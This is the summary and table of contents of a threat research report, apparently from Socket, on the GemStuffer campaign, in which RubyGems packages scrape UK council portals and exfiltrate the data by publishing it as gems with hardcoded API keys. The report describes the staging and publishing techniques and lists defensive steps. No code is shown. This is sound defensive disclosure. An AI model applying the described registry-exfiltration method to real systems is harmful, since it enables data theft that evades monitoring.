Socket's threat research team has identified a campaign called GemStuffer, involving 155+ RubyGems packages that abuse the package registry as a data exfiltration channel rather than a traditional malware distribution vector. The malicious gems scrape UK local government council portal pages (Lambeth, Wandsworth, Southwark) using Ruby's Net::HTTP, package the scraped HTML into valid .gem archives, and publish them to RubyGems using hardcoded API keys. The technique bypasses standard DLP tools since data is gzip-compressed inside tar archives over TLS. The campaign uses multiple compartmentalized API keys, ephemeral /tmp staging directories, and both gem CLI and direct HTTP POST publishing paths. RubyGems temporarily disabled new account registration in response. Defenders are advised to yank identified packages, audit /tmp directories, block outbound gem push in non-publishing CI pipelines, and monitor for ENV['HOME'] mutations to /tmp paths.
Table of contents
Attack Chain Summary #Targeted Scraping of UK Council Portals #Malicious Gem Staging #Credential Injection via HOME Override #Malicious Gem Push/Exfiltration #Recommended Actions #Indicators of Compromise #Sort: